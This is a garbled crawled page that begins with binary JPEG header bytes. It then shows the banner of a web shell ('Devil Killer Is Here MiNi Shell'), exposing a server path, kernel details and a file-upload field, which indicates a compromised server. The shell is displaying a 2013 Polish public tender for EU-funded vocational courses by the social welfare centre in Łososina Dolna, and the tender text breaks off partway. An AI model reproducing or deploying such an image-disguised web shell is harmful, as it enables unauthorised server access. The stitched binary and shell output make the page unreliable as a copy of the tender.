JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130726/298034-N-2013.html

<p class="kh_header"><b>Łososina Dolna: Usługa organizacji i przeprowadzenia kursów zawodowych w ramach aktywizacji edukacyjnej dla  beneficjentów ostatecznych uczestników projektu Reaktywacja realizowanego przez Ośrodek Pomocy Społecznej w Łososinie Dolnej  współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</b><br>
<b>Numer ogłoszenia: 298034 - 2013; data zamieszczenia: 26.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Łososinie Dolnej , Łososina Dolna 300, 33-314 Łososina Dolna, woj. małopolskie, tel. 18 444 80 02, faks 18 541 21 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.lososina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa organizacji i przeprowadzenia kursów zawodowych w ramach aktywizacji edukacyjnej dla  beneficjentów ostatecznych uczestników projektu Reaktywacja realizowanego przez Ośrodek Pomocy Społecznej w Łososinie Dolnej  współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa organizacji i przeprowadzenia kursów zawodowych w ramach aktywizacji edukacyjnej dla  beneficjentów ostatecznych uczestników projektu Reaktywacja realizowanego przez Ośrodek Pomocy Społecznej w Łososinie Dolnej  współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia/nie spełnia i na podstawie załączonego do oferty aktualnego na dany rok wpisu do Rejestru Instytucji Szkoleniowych (RIS).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się niezbędną wiedzą i doświadczeniem, tj. należytym wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie minimum  2 usług polegających na zorganizowaniu i przeprowadzeniu szkolenia dla Ośrodków Pomocy Społecznej lub Urzędów Pracy lub Powiatowych Centrów Pomocy Rodzinie o tematyce objętej przedmiotem zamówienia w danej części zamówienia. Uwzględnione w wykazie wykonanych usług zostaną wyłącznie usługi, które zostaną potwierdzone referencjami z ich realizacji (lub innym dokumentem świadczącym, że usługi zostały zrealizowane należycie).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wskaże do przeprowadzenia szkolenia/kursu:-w części I: Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli złoży oświadczenie, iż spełnia warunki udziału w postępowaniu  i wykaże, że na czas realizacji zamówienia dysponuje osobą z przygotowaniem merytorycznym, uprawnieniami zawodowymi dla przeprowadzenia Kursu Prawa jazdy kat. B z przedstawicielem handlowym, potwierdzone dokumentem CV (zawodowe) i kopią posiadanych uprawnień zawodowych  w tym zakresie,-w części II: Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli złoży oświadczenie, iż spełnia warunki udziału w postępowaniu i wykaże, że na czas realizacji zamówienia dysponuje osobą z przygotowaniem merytorycznym, zawodowym dla przeprowadzenia Kursu opiekuna osób starszych i niepełnosprawnych potwierdzone dokumentem CV (zawodowe) i kopią posiadanych kwalifikacji zawodowych.-w części III: Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli złoży oświadczenie, iż spełnia warunki udziału w postępowaniu, wykaże, że na czas realizacji zamówienia dysponuje osobą z przygotowaniem merytorycznym, uprawnieniami dla przeprowadzenia Kursu sprzedawcy z obsługą kasy fiskalnej, terminali płatniczych, komputera oraz z  fakturowaniem komputerowym, potwierdzone dokumentem CV (zawodowe) i kopią posiadanych kwalifikacji zawodowych. -części IV: Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli złoży oświadczenie, iż spełnia warunki udziału w postępowaniu wykaże, że na czas realizacji zamówienia dysponuje osobą z przygotowaniem merytorycznym, uprawnieniami zawodowymi dla przeprowadzenia Kursu bukieciarstwa i florystyka potwierdzone dokumentem CV (zawodowe) i kopią posiadanych kwalifikacji zawodowych.-w części V: Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli złoży oświadczenie, iż spełnia warunki udziału w postępowaniu, wykaże, że na czas realizacji zamówienia dysponuje osobą z przygotowaniem merytorycznym, uprawnieniami zawodowymi dla przeprowadzenia Kursu cukiernika potwierdzone dokumentem CV (zawodowe) i kopią posiadanych kwalifikacji zawodowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia/nie spełnia

Wykonawca może polegać na zasobach innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo - wymagane w przypadku gdy do reprezentowania Wykonawcy upoważniona jest osoba inna niż wskazane w aktualnym odpisie z właściwego rejestru. 2. Zobowiązanie innych podmiotów - Wykonawca może polegać na wiedzy i doświadczeniu potencjale technicznym osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty tylko i wyłącznie w sytuacji gdy konieczność wprowadzenia takiej zmiany wynikać będzie z sytuacji, której nie można było wcześniej przewidzieć lub gdy zmiana ta będzie korzystna dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lososina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Łososina Dolna 300, 33-314 Łososina Dolna,Ośrodek Pomocy Społecznej pok. nr 10..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2013 godzina 09:45, miejsce: Łososina Dolna 300, 33-314 Łososina Dolna, Ośrodek Pomocy Społecznej pok. nr 10..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Tak, Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs  Prawa jazdy kat. B z kursem przedstawiciela handlowego: dla 9 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cel szkolenia jest nabycie wiedzy i umiejętności do pracy w zawodzie przedstawiciela handlowego oraz uzyskanie kompetencji dla zwiększenia mobilności zawodowej oraz teoretyczne i praktyczne przygotowanie osób ubiegających się o uprawnienia do kierowania pojazdami silnikowymi w zakresie kategorii B prawa jazdy do egzaminu państwowego.
 Szkolenie składa sie z dwóch modułów:
1)Moduł I: 30 godzinny kurs przedstawiciela handlowego
2) Moduł II: Kurs prawo jazdy kat B (30 godzin teoria+30 godzin zajęć praktycznych). 
2. Zamawiający skieruje 9 uczestników projektu na kurs Prawa jazdy kat. B z kursem przedstawiciela handlowego w wymiarze 90 godzin łącznie dla obydwu modułów. Program i liczba godzin szkolenia w zakresie kursu prawo jazdy kat. B muszą być zgodne z rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów. (Dz. U. z 2005 r. Nr 217 poz. 1834 z późn. zm.) i obejmować część teoretyczną i praktyczną szkolenia.
3. Planowany termin rozpoczęcia szkolenia: od dnia podpisania umowy  do 31.10.2013r.
4. Treść nauczania: Program szkolenia 
   1. Moduł I: Przedstawiciel handlowy: rola i zadania przedstawiciela handlowego, zakres obowiązków przedstawiciela handlowego monitorowanie rynku pod względem popytu i podaży, reklama i promocja, dystrybucja, pozyskiwanie klientów, utrzymanie kontaktów handlowych, techniki i etapy sprzedaży, sprzedaż w terenie, organizowanie dostaw towarów do klientów,  komunikacja międzyludzka, negocjacje, techniki negocjacyjne, zarządzanie celami i czasem, zagadnienia finansowo-prawne dotyczące sprzedaży i zawodu handlowca zastrzeżenia, zażalenia, reklamacje.
2.Moduł II: Prawo jazdy kat. B  musi być zgodny z rozporządzeniem Ministra          Infrastruktury  z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania   i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów. (Dz. U.     z 2005 r. Nr 217 poz. 1834 z późn. zm.).
 6. Zamawiający wymaga, aby zajęcia odbywały się od poniedziałku do piątku w godzinach od 8.00-16.00. Zgodnie z ustalonym programem i harmonogramem kursu. Dotyczy to części teoretyczno - praktycznej z zakresu przedstawiciela handlowego oraz części teoretycznej z zakresu Prawa jazdy kat. B. Natomiast część praktyczna nauki jazdy powinna zostać ustalona indywidualnie z każdym kursantem. Liczba godzin ogółem podana przez Zamawiającego nie obejmuje godzin egzaminów.
7. Miejsce odbywania szkolenia: miasto Nowy Sącz,
8. Wykonawca zapewni uczestnikom kursu:
    -  niezbędne badania lekarskie, których koszt należy ująć w koszt szkolenia.
    -ustalenie terminu i opłacenie pierwszego egzaminu państwowego /dotyczy Modułu II/     którego koszt należy ująć w ogólny koszt szkolenia 
- materiały dydaktyczne oraz niezbędny sprzęt do wykorzystania podczas szkolenia 
-  przerwy kawowe w postaci poczęstunku każdego dnia kursu w którym osoba uczestniczy.
 Zamawiający rozumie pod postacią poczęstunku kawa /mielona typu Prima, rozpuszczalna typu Nescafe Classic /, herbata /typu Lipton/, cukier, śmietanka, ciastka/ typu różne w ilości  1 kg/dziennie/ zimne napoje/ typu piwniczanka w butelkach 0,5l, w ilości 9 butelek każdego dnia zajęć /dotyczy Modułu I i zajęć teoretycznych Modułu II/, koszt poczęstunku pokrywa wykonawca i wlicza go do kosztu szkolenia.
- odpowiednie wyposażenia sal: flipchart, tablica klasyczna lub magnetyczna, sprzęt audiowizualny, filmy instruktażowe, pomoce naukowe i do zajęć praktycznych w zakresie kursu na prawo jazdy kat. B - samochód osobowy przeznaczony do nauki jazdy.
- w okresie trwania zajęć Wykonawca ma obowiązek zapewnić kursantom - uczestnikom projektu skierowanym przez Zamawiającego, warunki bezpieczeństwa oraz higieny pracy i nauki zgodnie z obowiązującymi w tej materii przepisami prawa.
9. Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. 
10. Zamawiający wymaga:
a) ubezpieczenia wszystkich uczestników szkolenia w czasie jego trwania w ramach polisy     NNW.  Koszt  ubezpieczenia należy ująć w  koszt ogólny szkolenia 
b) aby szkolenie prowadził/li wykładowcy posiadający wykształcenie uprawniające do prowadzenia tego rodzaju kursu,
c) prowadzenia kart przeprowadzonych zajęć dotyczy zajęć z praktycznej jazdy Modułu II
d)  szkolenie winno zakończyć się egzaminem wewnętrznym oraz wydaniem:
      - zaświadczenia o jego ukończeniu zgodnie z rozporządzeniem MEN z dnia 11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. Poz. 186).- certyfikatu z logo Unii Europejskiej i Europejskiego Funduszu Społecznego oraz logo Programu Operacyjnego Kapitał Ludzki potwierdzającego ukończenie szkolenia. 11.Oferta winna obejmować koszty przeprowadzenia zajęć teoretycznych i praktycznych przez wykładowców i instruktorów zgodnie z wymaganiami Zamawiającego, koszty niezbędnych materiałów dydaktycznych i sprzętu dla wszystkich kursantów, koszty badań lekarskich, oraz koszty ubezpieczenia NNW wszystkich kursantów na czas uczestnictwa w kursie, koszt poczęstunku, a także koszt egzaminu wewnętrznego (jeżeli będzie odpłatny) /dotyczy Modułu I i II/ i koszt pierwszego egzaminu państwowego dla wszystkich kursantów /dotyczy Modułu II/. Oferta powinna zawierać cenę brutto na 1 osobę  i godzinę / ryczałt/ oraz  łączną kwotę za całość szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs: Opiekuna osób starszych i niepełnosprawnych dla 5 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cel szkolenia: Celem szkolenia jest przygotowanie uczestników do podjęcia pracy w charakterze opiekuna osób starszych i niepełnosprawnych.
2. Zamawiający skieruje 5 uczestników projektu na kurs Opiekuna osób starszych i
 niepełnosprawnych w wymiarze 130 godzin zegarowych.
3. Liczba godzin ogółem: 130 godzin teoretyczno-zawodowych i praktycznych dla każdego uczestnika projektu. 
a) 40 godzin zajęć teoretyczno-zawodowych - Moduł I
b) 90 godzin zajęć praktycznych - Moduł II
4. Planowany termin rozpoczęcia szkolenia: od dnia 19 sierpnia 2013 r. do 30.09.2013r.
5. Treść nauczania:
a) Moduł I teoretyczno-zawodowy obejmujący 40 godzin zegarowych: zakres i rodzaje pomocy prawnej, zdrowotnej i socjalnej państwa, zasady opieki w placówkach opieki społecznej,  wybrane zagadnienia z psychologii ogólnej i społecznej, podstawy psychologii rozwojowej, pedagogika specjalna z elementami nauczania specjalnego, podstawy gerontologii, organizacja pomocy społecznej, wybrane zagadnienia z rehabilitacji, elementy komunikacji interpersonalnej, organizowanie środowiska i otoczenia podopiecznego,pierwsza pomoc przedmedyczna, kultura osobista i etyka zawodowa,
b) Moduł II - praktyczny - obejmujący 90 godzin zegarowych zajęć praktycznych w
Domu Pomocy Społecznej, lub innych placówkach rehabilitacji i opieki medycznej.
Zamawiający oczekuje, że po zakończeniu szkolenia uczestnicy będą przygotowani do wykonywania następujących zadań: pomagania i towarzyszenia podopiecznemu w codziennych czynnościach z zakresu samoobsługi i higieny osobistej, podstawowego pielęgnowania podopiecznych, chorych i niepełnosprawnych, pomaganie przy usprawnieniu ruchowym chorego, niepełnosprawnego,  kontaktowania się z różnego rodzaju instytucjami i organizacjami społecznymi w celu rozwiązywania problemów zdrowotnych, materialnych, mieszkaniowych, rodzinnych i prawnych podopiecznego, aktywne uczestniczenie w procesie rehabilitacji i aktywizacji podopiecznego oraz wykonywanie określonych zadań pod nadzorem lekarza bądź terapeuty, udzielenie pierwszej pomocy w sytuacjach zagrożenia zdrowia lub życia podopiecznego,
6. Wymaga się aby zajęcia szkoleniowe odbywały się wyłącznie w dni robocze (poniedziałek    -  piątek).
7. Miejsce odbywania szkolenia: miasto Nowy Sącz,
8. Zajęcia powinny zaczynać się nie wcześniej niż o godz. 8.00, kończyć nie później niż o godzinie 15.00
9. Liczba godzin zajęć powinna obejmować przeciętnie nie mniej niż 25 godzin zegarowych tygodniowo.
10. Wykonawca zapewni uczestnikom szkolenia:
- odzież ochronną podczas odbywania zajęć praktycznych;
